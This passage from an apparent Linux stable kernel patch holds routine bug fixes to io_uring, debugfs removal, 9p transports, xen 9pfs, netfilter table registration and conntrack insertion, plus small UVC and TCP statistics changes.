++	UVC_COLOR_PRIMARIES_BT_470_2_B_G,
++	UVC_COLOR_PRIMARIES_SMPTE_170M,
++	UVC_COLOR_PRIMARIES_SMPTE_240M,
++};
++
++enum uvc_transfer_characteristics_values {
++	UVC_TRANSFER_CHARACTERISTICS_UNSPECIFIED,
++	UVC_TRANSFER_CHARACTERISTICS_BT_709,
++	UVC_TRANSFER_CHARACTERISTICS_BT_470_2_M,
++	UVC_TRANSFER_CHARACTERISTICS_BT_470_2_B_G,
++	UVC_TRANSFER_CHARACTERISTICS_SMPTE_170M,
++	UVC_TRANSFER_CHARACTERISTICS_SMPTE_240M,
++	UVC_TRANSFER_CHARACTERISTICS_LINEAR,
++	UVC_TRANSFER_CHARACTERISTICS_SRGB,
++};
++
++enum uvc_matrix_coefficients {
++	UVC_MATRIX_COEFFICIENTS_UNSPECIFIED,
++	UVC_MATRIX_COEFFICIENTS_BT_709,
++	UVC_MATRIX_COEFFICIENTS_FCC,
++	UVC_MATRIX_COEFFICIENTS_BT_470_2_B_G,
++	UVC_MATRIX_COEFFICIENTS_SMPTE_170M,
++	UVC_MATRIX_COEFFICIENTS_SMPTE_240M,
++};
++
+ /* ------------------------------------------------------------------------
+  * UVC structures
+  */
+diff --git a/include/uapi/linux/uvcvideo.h b/include/uapi/linux/uvcvideo.h
+index 8288137387c0d..a9d0a64007ba5 100644
+--- a/include/uapi/linux/uvcvideo.h
++++ b/include/uapi/linux/uvcvideo.h
+@@ -86,7 +86,7 @@ struct uvc_xu_control_query {
+  * struct. The first two fields are added by the driver, they can be used for
+  * clock synchronisation. The rest is an exact copy of a UVC payload header.
+  * Only complete objects with complete buffers are included. Therefore it's
+- * always sizeof(meta->ts) + sizeof(meta->sof) + meta->length bytes large.
++ * always sizeof(meta->ns) + sizeof(meta->sof) + meta->length bytes large.
+  */
+ struct uvc_meta_buf {
+ 	__u64 ns;
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index e2c46889d5fab..746b137b96e9b 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -509,7 +509,7 @@ int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
+ 	}
+ 
+ 	pages = io_pin_pages(reg.ring_addr,
+-			     struct_size(br, bufs, reg.ring_entries),
++			     flex_array_size(br, bufs, reg.ring_entries),
+ 			     &nr_pages);
+ 	if (IS_ERR(pages)) {
+ 		kfree(free_bl);
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 55d822beaf084..4fdc2770bbe44 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -126,13 +126,15 @@ static struct io_async_msghdr *io_msg_alloc_async(struct io_kiocb *req,
+ 	struct io_cache_entry *entry;
+ 	struct io_async_msghdr *hdr;
+ 
+-	if (!(issue_flags & IO_URING_F_UNLOCKED) &&
+-	    (entry = io_alloc_cache_get(&ctx->netmsg_cache)) != NULL) {
+-		hdr = container_of(entry, struct io_async_msghdr, cache);
+-		hdr->free_iov = NULL;
+-		req->flags |= REQ_F_ASYNC_DATA;
+-		req->async_data = hdr;
+-		return hdr;
++	if (!(issue_flags & IO_URING_F_UNLOCKED)) {
++		entry = io_alloc_cache_get(&ctx->netmsg_cache);
++		if (entry) {
++			hdr = container_of(entry, struct io_async_msghdr, cache);
++			hdr->free_iov = NULL;
++			req->flags |= REQ_F_ASYNC_DATA;
++			req->async_data = hdr;
++			return hdr;
++		}
+ 	}
+ 
+ 	if (!io_alloc_async_data(req)) {
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index ab5ae475840f4..56dbd1863c785 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -668,6 +668,14 @@ static void io_async_queue_proc(struct file *file, struct wait_queue_head *head,
+ 	__io_queue_proc(&apoll->poll, pt, head, &apoll->double_poll);
+ }
+ 
++/*
++ * We can't reliably detect loops in repeated poll triggers and issue
++ * subsequently failing. But rather than fail these immediately, allow a
++ * certain amount of retries before we give up. Given that this condition
++ * should _rarely_ trigger even once, we should be fine with a larger value.
++ */
++#define APOLL_MAX_RETRY		128
++
+ static struct async_poll *io_req_alloc_apoll(struct io_kiocb *req,
+ 					     unsigned issue_flags)
+ {
+@@ -678,16 +686,23 @@ static struct async_poll *io_req_alloc_apoll(struct io_kiocb *req,
+ 	if (req->flags & REQ_F_POLLED) {
+ 		apoll = req->apoll;
+ 		kfree(apoll->double_poll);
+-	} else if (!(issue_flags & IO_URING_F_UNLOCKED) &&
+-		   (entry = io_alloc_cache_get(&ctx->apoll_cache)) != NULL) {
++	} else if (!(issue_flags & IO_URING_F_UNLOCKED)) {
++		entry = io_alloc_cache_get(&ctx->apoll_cache);
++		if (entry == NULL)
++			goto alloc_apoll;
+ 		apoll = container_of(entry, struct async_poll, cache);
++		apoll->poll.retries = APOLL_MAX_RETRY;
+ 	} else {
++alloc_apoll:
+ 		apoll = kmalloc(sizeof(*apoll), GFP_ATOMIC);
+ 		if (unlikely(!apoll))
+ 			return NULL;
++		apoll->poll.retries = APOLL_MAX_RETRY;
+ 	}
+ 	apoll->double_poll = NULL;
+ 	req->apoll = apoll;
++	if (unlikely(!--apoll->poll.retries))
++		return NULL;
+ 	return apoll;
+ }
+ 
+@@ -709,8 +724,6 @@ int io_arm_poll_handler(struct io_kiocb *req, unsigned issue_flags)
+ 		return IO_APOLL_ABORTED;
+ 	if (!file_can_poll(req->file))
+ 		return IO_APOLL_ABORTED;
+-	if ((req->flags & (REQ_F_POLLED|REQ_F_PARTIAL_IO)) == REQ_F_POLLED)
+-		return IO_APOLL_ABORTED;
+ 	if (!(req->flags & REQ_F_APOLL_MULTISHOT))
+ 		mask |= EPOLLONESHOT;
+ 
+diff --git a/io_uring/poll.h b/io_uring/poll.h
+index 5f3bae50fc81a..b2393b403a2c2 100644
+--- a/io_uring/poll.h
++++ b/io_uring/poll.h
+@@ -12,6 +12,7 @@ struct io_poll {
+ 	struct file			*file;
+ 	struct wait_queue_head		*head;
+ 	__poll_t			events;
++	int				retries;
+ 	struct wait_queue_entry		wait;
+ };
+ 
+diff --git a/kernel/fail_function.c b/kernel/fail_function.c
+index a7ccd2930c5f4..d971a01893197 100644
+--- a/kernel/fail_function.c
++++ b/kernel/fail_function.c
+@@ -163,10 +163,7 @@ static void fei_debugfs_add_attr(struct fei_attr *attr)
+ 
+ static void fei_debugfs_remove_attr(struct fei_attr *attr)
+ {
+-	struct dentry *dir;
+-
+-	dir = debugfs_lookup(attr->kp.symbol_name, fei_debugfs_dir);
+-	debugfs_remove_recursive(dir);
++	debugfs_lookup_and_remove(attr->kp.symbol_name, fei_debugfs_dir);
+ }
+ 
+ static int fei_kprobe_handler(struct kprobe *kp, struct pt_regs *regs)
+diff --git a/kernel/irq/ipi.c b/kernel/irq/ipi.c
+index bbd945bacef08..961d4af76af37 100644
+--- a/kernel/irq/ipi.c
++++ b/kernel/irq/ipi.c
+@@ -188,9 +188,9 @@ EXPORT_SYMBOL_GPL(ipi_get_hwirq);
+ static int ipi_send_verify(struct irq_chip *chip, struct irq_data *data,
+ 			   const struct cpumask *dest, unsigned int cpu)
+ {
+-	const struct cpumask *ipimask = irq_data_get_affinity_mask(data);
++	const struct cpumask *ipimask;
+ 
+-	if (!chip || !ipimask)
++	if (!chip || !data)
+ 		return -EINVAL;
+ 
+ 	if (!chip->ipi_send_single && !chip->ipi_send_mask)
+@@ -199,6 +199,10 @@ static int ipi_send_verify(struct irq_chip *chip, struct irq_data *data,
+ 	if (cpu >= nr_cpu_ids)
+ 		return -EINVAL;
+ 
++	ipimask = irq_data_get_affinity_mask(data);
++	if (!ipimask)
++		return -EINVAL;
++
+ 	if (dest) {
+ 		if (!cpumask_subset(dest, ipimask))
+ 			return -EINVAL;
+diff --git a/kernel/printk/index.c b/kernel/printk/index.c
+index c85be186a7832..a6b27526baaf6 100644
+--- a/kernel/printk/index.c
++++ b/kernel/printk/index.c
+@@ -145,7 +145,7 @@ static void pi_create_file(struct module *mod)
+ #ifdef CONFIG_MODULES
+ static void pi_remove_file(struct module *mod)
+ {
+-	debugfs_remove(debugfs_lookup(pi_get_module_name(mod), dfs_index));
++	debugfs_lookup_and_remove(pi_get_module_name(mod), dfs_index);
+ }
+ 
+ static int pi_module_notify(struct notifier_block *nb, unsigned long op,
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index c35e08b74014f..361bd8beafdff 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -5588,11 +5588,16 @@ EXPORT_SYMBOL_GPL(ring_buffer_alloc_read_page);
+  */
+ void ring_buffer_free_read_page(struct trace_buffer *buffer, int cpu, void *data)
+ {
+-	struct ring_buffer_per_cpu *cpu_buffer = buffer->buffers[cpu];
++	struct ring_buffer_per_cpu *cpu_buffer;
+ 	struct buffer_data_page *bpage = data;
+ 	struct page *page = virt_to_page(bpage);
+ 	unsigned long flags;
+ 
++	if (!buffer || !buffer->buffers || !buffer->buffers[cpu])
++		return;
++
++	cpu_buffer = buffer->buffers[cpu];
++
+ 	/* If the page is still in use someplace else, we can't reuse it */
+ 	if (page_ref_count(page) > 1)
+ 		goto out;
+diff --git a/net/9p/trans_rdma.c b/net/9p/trans_rdma.c
+index e9a830c69058c..29a9292303ea3 100644
+--- a/net/9p/trans_rdma.c
++++ b/net/9p/trans_rdma.c
+@@ -386,6 +386,7 @@ post_recv(struct p9_client *client, struct p9_rdma_context *c)
+ 	struct p9_trans_rdma *rdma = client->trans;
+ 	struct ib_recv_wr wr;
+ 	struct ib_sge sge;
++	int ret;
+ 
+ 	c->busa = ib_dma_map_single(rdma->cm_id->device,
+ 				    c->rc.sdata, client->msize,
+@@ -403,7 +404,12 @@ post_recv(struct p9_client *client, struct p9_rdma_context *c)
+ 	wr.wr_cqe = &c->cqe;
+ 	wr.sg_list = &sge;
+ 	wr.num_sge = 1;
+-	return ib_post_recv(rdma->qp, &wr, NULL);
++
++	ret = ib_post_recv(rdma->qp, &wr, NULL);
++	if (ret)
++		ib_dma_unmap_single(rdma->cm_id->device, c->busa,
++				    client->msize, DMA_FROM_DEVICE);
++	return ret;
+ 
+  error:
+ 	p9_debug(P9_DEBUG_ERROR, "EIO\n");
+@@ -500,7 +506,7 @@ dont_need_post_recv:
+ 
+ 	if (down_interruptible(&rdma->sq_sem)) {
+ 		err = -EINTR;
+-		goto send_error;
++		goto dma_unmap;
+ 	}
+ 
+ 	/* Mark request as `sent' *before* we actually send it,
+@@ -510,11 +516,14 @@ dont_need_post_recv:
+ 	WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ 	err = ib_post_send(rdma->qp, &wr, NULL);
+ 	if (err)
+-		goto send_error;
++		goto dma_unmap;
+ 
+ 	/* Success */
+ 	return 0;
+ 
++dma_unmap:
++	ib_dma_unmap_single(rdma->cm_id->device, c->busa,
++			    c->req->tc.size, DMA_TO_DEVICE);
+  /* Handle errors that happened during or while preparing the send: */
+  send_error:
+ 	WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+diff --git a/net/9p/trans_xen.c b/net/9p/trans_xen.c
+index cf1b89ba522b4..75c03a82baf38 100644
+--- a/net/9p/trans_xen.c
++++ b/net/9p/trans_xen.c
+@@ -371,19 +371,24 @@ out:
+ 	return ret;
+ }
+ 
+-static int xen_9pfs_front_probe(struct xenbus_device *dev,
+-				const struct xenbus_device_id *id)
++static int xen_9pfs_front_init(struct xenbus_device *dev)
+ {
+ 	int ret, i;
+ 	struct xenbus_transaction xbt;
+-	struct xen_9pfs_front_priv *priv = NULL;
+-	char *versions;
++	struct xen_9pfs_front_priv *priv = dev_get_drvdata(&dev->dev);
++	char *versions, *v;
+ 	unsigned int max_rings, max_ring_order, len = 0;
+ 
+ 	versions = xenbus_read(XBT_NIL, dev->otherend, "versions", &len);
+ 	if (IS_ERR(versions))
+ 		return PTR_ERR(versions);
+-	if (strcmp(versions, "1")) {
++	for (v = versions; *v; v++) {
++		if (simple_strtoul(v, &v, 10) == 1) {
++			v = NULL;
++			break;
++		}
++	}
++	if (v) {
+ 		kfree(versions);
+ 		return -EINVAL;
+ 	}
+@@ -398,11 +403,6 @@ static int xen_9pfs_front_probe(struct xenbus_device *dev,
+ 	if (p9_xen_trans.maxsize > XEN_FLEX_RING_SIZE(max_ring_order))
+ 		p9_xen_trans.maxsize = XEN_FLEX_RING_SIZE(max_ring_order) / 2;
+ 
+-	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+-	if (!priv)
+-		return -ENOMEM;
+-
+-	priv->dev = dev;
+ 	priv->num_rings = XEN_9PFS_NUM_RINGS;
+ 	priv->rings = kcalloc(priv->num_rings, sizeof(*priv->rings),
+ 			      GFP_KERNEL);
+@@ -461,23 +461,35 @@ static int xen_9pfs_front_probe(struct xenbus_device *dev,
+ 		goto error;
+ 	}
+ 
+-	write_lock(&xen_9pfs_lock);
+-	list_add_tail(&priv->list, &xen_9pfs_devs);
+-	write_unlock(&xen_9pfs_lock);
+-	dev_set_drvdata(&dev->dev, priv);
+-	xenbus_switch_state(dev, XenbusStateInitialised);
+-
+ 	return 0;
+ 
+  error_xenbus:
+ 	xenbus_transaction_end(xbt, 1);
+ 	xenbus_dev_fatal(dev, ret, "writing xenstore");
+  error:
+-	dev_set_drvdata(&dev->dev, NULL);
+ 	xen_9pfs_front_free(priv);
+ 	return ret;
+ }
+ 
++static int xen_9pfs_front_probe(struct xenbus_device *dev,
++				const struct xenbus_device_id *id)
++{
++	struct xen_9pfs_front_priv *priv = NULL;
++
++	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
++	if (!priv)
++		return -ENOMEM;
++
++	priv->dev = dev;
++	dev_set_drvdata(&dev->dev, priv);
++
++	write_lock(&xen_9pfs_lock);
++	list_add_tail(&priv->list, &xen_9pfs_devs);
++	write_unlock(&xen_9pfs_lock);
++
++	return 0;
++}
++
+ static int xen_9pfs_front_resume(struct xenbus_device *dev)
+ {
+ 	dev_warn(&dev->dev, "suspend/resume unsupported\n");
+@@ -496,6 +508,8 @@ static void xen_9pfs_front_changed(struct xenbus_device *dev,
+ 		break;
+ 
+ 	case XenbusStateInitWait:
++		if (!xen_9pfs_front_init(dev))
++			xenbus_switch_state(dev, XenbusStateInitialised);
+ 		break;
+ 
+ 	case XenbusStateConnected:
+diff --git a/net/bridge/netfilter/ebtables.c b/net/bridge/netfilter/ebtables.c
+index ce5dfa3babd26..757ec46fc45a0 100644
+--- a/net/bridge/netfilter/ebtables.c
++++ b/net/bridge/netfilter/ebtables.c
+@@ -1090,7 +1090,7 @@ static int do_replace_finish(struct net *net, struct ebt_replace *repl,
+ 
+ 	audit_log_nfcfg(repl->name, AF_BRIDGE, repl->nentries,
+ 			AUDIT_XT_OP_REPLACE, GFP_KERNEL);
+-	return ret;
++	return 0;
+ 
+ free_unlock:
+ 	mutex_unlock(&ebt_mutex);
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 7a2a4650a8988..24eae99dfe05a 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3146,8 +3146,10 @@ void __dev_kfree_skb_any(struct sk_buff *skb, enum skb_free_reason reason)
+ {
+ 	if (in_hardirq() || irqs_disabled())
+ 		__dev_kfree_skb_irq(skb, reason);
++	else if (unlikely(reason == SKB_REASON_DROPPED))
++		kfree_skb(skb);
+ 	else
+-		dev_kfree_skb(skb);
++		consume_skb(skb);
+ }
+ EXPORT_SYMBOL(__dev_kfree_skb_any);
+ 
+diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
+index ffc0cab7cf189..2407066b0fec1 100644
+--- a/net/ipv4/netfilter/arp_tables.c
++++ b/net/ipv4/netfilter/arp_tables.c
+@@ -1525,6 +1525,10 @@ int arpt_register_table(struct net *net,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct arpt_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
+index 2ed7c58b471ac..da5998011ab9b 100644
+--- a/net/ipv4/netfilter/ip_tables.c
++++ b/net/ipv4/netfilter/ip_tables.c
+@@ -1045,7 +1045,6 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 	struct xt_counters *counters;
+ 	struct ipt_entry *iter;
+ 
+-	ret = 0;
+ 	counters = xt_counters_alloc(num_counters);
+ 	if (!counters) {
+ 		ret = -ENOMEM;
+@@ -1091,7 +1090,7 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 		net_warn_ratelimited("iptables: counters copy to user failed while replacing table\n");
+ 	}
+ 	vfree(counters);
+-	return ret;
++	return 0;
+ 
+  put_module:
+ 	module_put(t->me);
+@@ -1742,6 +1741,10 @@ int ipt_register_table(struct net *net, const struct xt_table *table,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct ipt_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
+index c375f603a16cf..7f37e7da64671 100644
+--- a/net/ipv4/tcp_minisocks.c
++++ b/net/ipv4/tcp_minisocks.c
+@@ -580,6 +580,9 @@ EXPORT_SYMBOL(tcp_create_openreq_child);
+  * validation and inside tcp_v4_reqsk_send_ack(). Can we do better?
+  *
+  * We don't need to initialize tmp_opt.sack_ok as we don't use the results
++ *
++ * Note: If @fastopen is true, this can be called from process context.
++ *       Otherwise, this is from BH context.
+  */
+ 
+ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+@@ -731,7 +734,7 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 					  &tcp_rsk(req)->last_oow_ack_time))
+ 			req->rsk_ops->send_ack(sk, skb, req);
+ 		if (paws_reject)
+-			__NET_INC_STATS(sock_net(sk), LINUX_MIB_PAWSESTABREJECTED);
++			NET_INC_STATS(sock_net(sk), LINUX_MIB_PAWSESTABREJECTED);
+ 		return NULL;
+ 	}
+ 
+@@ -750,7 +753,7 @@ struct sock *tcp_check_req(struct sock *sk, struct sk_buff *skb,
+ 	 *	   "fourth, check the SYN bit"
+ 	 */
+ 	if (flg & (TCP_FLAG_RST|TCP_FLAG_SYN)) {
+-		__TCP_INC_STATS(sock_net(sk), TCP_MIB_ATTEMPTFAILS);
++		TCP_INC_STATS(sock_net(sk), TCP_MIB_ATTEMPTFAILS);
+ 		goto embryonic_reset;
+ 	}
+ 
+diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
+index 2d816277f2c5a..0ce0ed17c7583 100644
+--- a/net/ipv6/netfilter/ip6_tables.c
++++ b/net/ipv6/netfilter/ip6_tables.c
+@@ -1062,7 +1062,6 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 	struct xt_counters *counters;
+ 	struct ip6t_entry *iter;
+ 
+-	ret = 0;
+ 	counters = xt_counters_alloc(num_counters);
+ 	if (!counters) {
+ 		ret = -ENOMEM;
+@@ -1108,7 +1107,7 @@ __do_replace(struct net *net, const char *name, unsigned int valid_hooks,
+ 		net_warn_ratelimited("ip6tables: counters copy to user failed while replacing table\n");
+ 	}
+ 	vfree(counters);
+-	return ret;
++	return 0;
+ 
+  put_module:
+ 	module_put(t->me);
+@@ -1751,6 +1750,10 @@ int ip6t_register_table(struct net *net, const struct xt_table *table,
+ 
+ 	new_table = xt_register_table(net, table, &bootstrap, newinfo);
+ 	if (IS_ERR(new_table)) {
++		struct ip6t_entry *iter;
++
++		xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
++			cleanup_entry(iter, net);
+ 		xt_free_table_info(newinfo);
+ 		return PTR_ERR(new_table);
+ 	}
+diff --git a/net/ipv6/netfilter/ip6t_rpfilter.c b/net/ipv6/netfilter/ip6t_rpfilter.c
+index a01d9b842bd07..67c87a88cde4f 100644
+--- a/net/ipv6/netfilter/ip6t_rpfilter.c
++++ b/net/ipv6/netfilter/ip6t_rpfilter.c
+@@ -72,7 +72,9 @@ static bool rpfilter_lookup_reverse6(struct net *net, const struct sk_buff *skb,
+ 		goto out;
+ 	}
+ 
+-	if (rt->rt6i_idev->dev == dev || (flags & XT_RPFILTER_LOOSE))
++	if (rt->rt6i_idev->dev == dev ||
++	    l3mdev_master_ifindex_rcu(rt->rt6i_idev->dev) == dev->ifindex ||
++	    (flags & XT_RPFILTER_LOOSE))
+ 		ret = true;
+  out:
+ 	ip6_rt_put(rt);
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 2f355f0ec32ac..0b060cb8681f0 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -5540,16 +5540,17 @@ static size_t rt6_nlmsg_size(struct fib6_info *f6i)
+ 		nexthop_for_each_fib6_nh(f6i->nh, rt6_nh_nlmsg_size,
+ 					 &nexthop_len);
+ 	} else {
++		struct fib6_info *sibling, *next_sibling;
+ 		struct fib6_nh *nh = f6i->fib6_nh;
+ 
+ 		nexthop_len = 0;
+ 		if (f6i->fib6_nsiblings) {
+-			nexthop_len = nla_total_size(0)	 /* RTA_MULTIPATH */
+-				    + NLA_ALIGN(sizeof(struct rtnexthop))
+-				    + nla_total_size(16) /* RTA_GATEWAY */
+-				    + lwtunnel_get_encap_size(nh->fib_nh_lws);
++			rt6_nh_nlmsg_size(nh, &nexthop_len);
+ 
+-			nexthop_len *= f6i->fib6_nsiblings;
++			list_for_each_entry_safe(sibling, next_sibling,
++						 &f6i->fib6_siblings, fib6_siblings) {
++				rt6_nh_nlmsg_size(sibling->fib6_nh, &nexthop_len);
++			}
+ 		}
+ 		nexthop_len += lwtunnel_get_encap_size(nh->fib_nh_lws);
+ 	}
+diff --git a/net/netfilter/core.c b/net/netfilter/core.c
+index 5a6705a0e4ecf..6e80f0f6149ea 100644
+--- a/net/netfilter/core.c
++++ b/net/netfilter/core.c
+@@ -669,6 +669,9 @@ const struct nf_ct_hook __rcu *nf_ct_hook __read_mostly;
+ EXPORT_SYMBOL_GPL(nf_ct_hook);
+ 
+ #if IS_ENABLED(CONFIG_NF_CONNTRACK)
++u8 nf_ctnetlink_has_listener;
++EXPORT_SYMBOL_GPL(nf_ctnetlink_has_listener);
++
+ const struct nf_nat_hook __rcu *nf_nat_hook __read_mostly;
+ EXPORT_SYMBOL_GPL(nf_nat_hook);
+ 
+diff --git a/net/netfilter/nf_conntrack_bpf.c b/net/netfilter/nf_conntrack_bpf.c
+index 8639e7efd0e22..adae86e8e02e8 100644
+--- a/net/netfilter/nf_conntrack_bpf.c
++++ b/net/netfilter/nf_conntrack_bpf.c
+@@ -384,7 +384,6 @@ struct nf_conn *bpf_ct_insert_entry(struct nf_conn___init *nfct_i)
+ 	struct nf_conn *nfct = (struct nf_conn *)nfct_i;
+ 	int err;
+ 
+-	nfct->status |= IPS_CONFIRMED;
+ 	err = nf_conntrack_hash_check_insert(nfct);
+ 	if (err < 0) {
+ 		nf_conntrack_free(nfct);
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 23b3fedd619a5..7f0f3bcaae031 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -890,10 +890,8 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 
+ 	zone = nf_ct_zone(ct);
+ 
+-	if (!nf_ct_ext_valid_pre(ct->ext)) {
+-		NF_CT_STAT_INC_ATOMIC(net, insert_failed);
+-		return -ETIMEDOUT;
+-	}
++	if (!nf_ct_ext_valid_pre(ct->ext))
++		return -EAGAIN;
+ 
+ 	local_bh_disable();
+ 	do {
+@@ -928,6 +926,19 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 			goto chaintoolong;
+ 	}
+ 
++	/* If genid has changed, we can't insert anymore because ct
++	 * extensions could have stale pointers and nf_ct_iterate_destroy
++	 * might have completed its table scan already.
++	 *
++	 * Increment of the ext genid right after this check is fine:
++	 * nf_ct_iterate_destroy blocks until locks are released.
++	 */
++	if (!nf_ct_ext_valid_post(ct->ext)) {
++		err = -EAGAIN;
++		goto out;
++	}
++
++	ct->status |= IPS_CONFIRMED;
+ 	smp_wmb();
+ 	/* The caller holds a reference to this object */
+ 	refcount_set(&ct->ct_general.use, 2);
+@@ -936,12 +947,6 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 	NF_CT_STAT_INC(net, insert);
+ 	local_bh_enable();
+ 
+-	if (!nf_ct_ext_valid_post(ct->ext)) {
+-		nf_ct_kill(ct);
+-		NF_CT_STAT_INC_ATOMIC(net, drop);
+-		return -ETIMEDOUT;
+-	}
+-
+ 	return 0;
+ chaintoolong:
+ 	NF_CT_STAT_INC(net, chaintoolong);
+diff --git a/net/netfilter/nf_conntrack_ecache.c b/net/netfilter/nf_conntrack_ecache.c
+index 8698b34246460..69948e1d6974e 100644
+--- a/net/netfilter/nf_conntrack_ecache.c
++++ b/net/netfilter/nf_conntrack_ecache.c
+@@ -309,7 +309,7 @@ bool nf_ct_ecache_ext_add(struct nf_conn *ct, u16 ctmask, u16 expmask, gfp_t gfp
+ 			break;
+ 		return true;
+ 	case 2: /* autodetect: no event listener, don't allocate extension. */
+-		if (!READ_ONCE(net->ct.ctnetlink_has_listener))
++		if (!READ_ONCE(nf_ctnetlink_has_listener))
+ 			return true;
+ 		fallthrough;
+ 	case 1:
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 1286ae7d46096..733bb56950c14 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -2316,9 +2316,6 @@ ctnetlink_create_conntrack(struct net *net,
+ 	nfct_seqadj_ext_add(ct);
+ 	nfct_synproxy_ext_add(ct);
+ 
+-	/* we must add conntrack extensions before confirmation. */
+-	ct->status |= IPS_CONFIRMED;
+-
+ 	if (cda[CTA_STATUS]) {
+ 		err = ctnetlink_change_status(ct, cda);
+ 		if (err < 0)
+@@ -2375,12 +2372,15 @@ ctnetlink_create_conntrack(struct net *net,
+ 
+ 	err = nf_conntrack_hash_check_insert(ct);
+ 	if (err < 0)
+-		goto err2;
++		goto err3;
+ 
+ 	rcu_read_unlock();
+ 
+ 	return ct;
+ 
++err3:
++	if (ct->master)
++		nf_ct_put(ct->master);
+ err2:
+ 	rcu_read_unlock();
+ err1:
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index dca5352bdf3d7..1a9d759d0a026 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -5439,7 +5439,7 @@ static int nf_tables_getsetelem(struct sk_buff *skb,
+ 	int rem, err = 0;
+ 
+ 	table = nft_table_lookup(net, nla[NFTA_SET_ELEM_LIST_TABLE], family,
+-				 genmask, NETLINK_CB(skb).portid);
++				 genmask, 0);
+ 	if (IS_ERR(table)) {
+ 		NL_SET_BAD_ATTR(extack, nla[NFTA_SET_ELEM_LIST_TABLE]);
+ 		return PTR_ERR(table);
+diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
+index 6d18fb3468683..81c7737c803a6 100644
+--- a/net/netfilter/nfnetlink.c
++++ b/net/netfilter/nfnetlink.c
+@@ -29,6 +29,7 @@
+ 
+ #include <net/netlink.h>
+ #include <net/netns/generic.h>
++#include <linux/netfilter.h>
+ #include <linux/netfilter/nfnetlink.h>
+ 
+ MODULE_LICENSE("GPL");
+@@ -685,12 +686,12 @@ static void nfnetlink_bind_event(struct net *net, unsigned int group)
+ 	group_bit = (1 << group);
+ 
+ 	spin_lock(&nfnl_grp_active_lock);
+-	v = READ_ONCE(net->ct.ctnetlink_has_listener);
++	v = READ_ONCE(nf_ctnetlink_has_listener);
+ 	if ((v & group_bit) == 0) {
+ 		v |= group_bit;
+ 
+ 		/* read concurrently without nfnl_grp_active_lock held. */
+-		WRITE_ONCE(net->ct.ctnetlink_has_listener, v);
++		WRITE_ONCE(nf_ctnetlink_has_listener, v);
+ 	}
+ 
+ 	spin_unlock(&nfnl_grp_active_lock);
+@@ -744,12 +745,12 @@ static void nfnetlink_unbind(struct net *net, int group)
+ 
+ 	spin_lock(&nfnl_grp_active_lock);
+ 	if (!nfnetlink_has_listeners(net, group)) {
+-		u8 v = READ_ONCE(net->ct.ctnetlink_has_listener);
++		u8 v = READ_ONCE(nf_ctnetlink_has_listener);
+ 
+ 		v &= ~group_bit;
+ 
+ 		/* read concurrently without nfnl_grp_active_lock held. */
+-		WRITE_ONCE(net->ct.ctnetlink_has_listener, v);
++		WRITE_ONCE(nf_ctnetlink_has_listener, v);
+ 	}
+ 	spin_unlock(&nfnl_grp_active_lock);
+ #endif
+diff --git a/net/netfilter/xt_length.c b/net/netfilter/xt_length.c
+index 1873da3a945ab..9fbfad13176f0 100644
+--- a/net/netfilter/xt_length.c
++++ b/net/netfilter/xt_length.c
+@@ -30,8 +30,7 @@ static bool
+ length_mt6(const struct sk_buff *skb, struct xt_action_param *par)
+ {
+ 	const struct xt_length_info *info = par->matchinfo;
+-	const u_int16_t pktlen = ntohs(ipv6_hdr(skb)->payload_len) +
+-				 sizeof(struct ipv6hdr);
++	u32 pktlen = skb->len;
+ 
+ 	return (pktlen >= info->min && pktlen <= info->max) ^ info->invert;
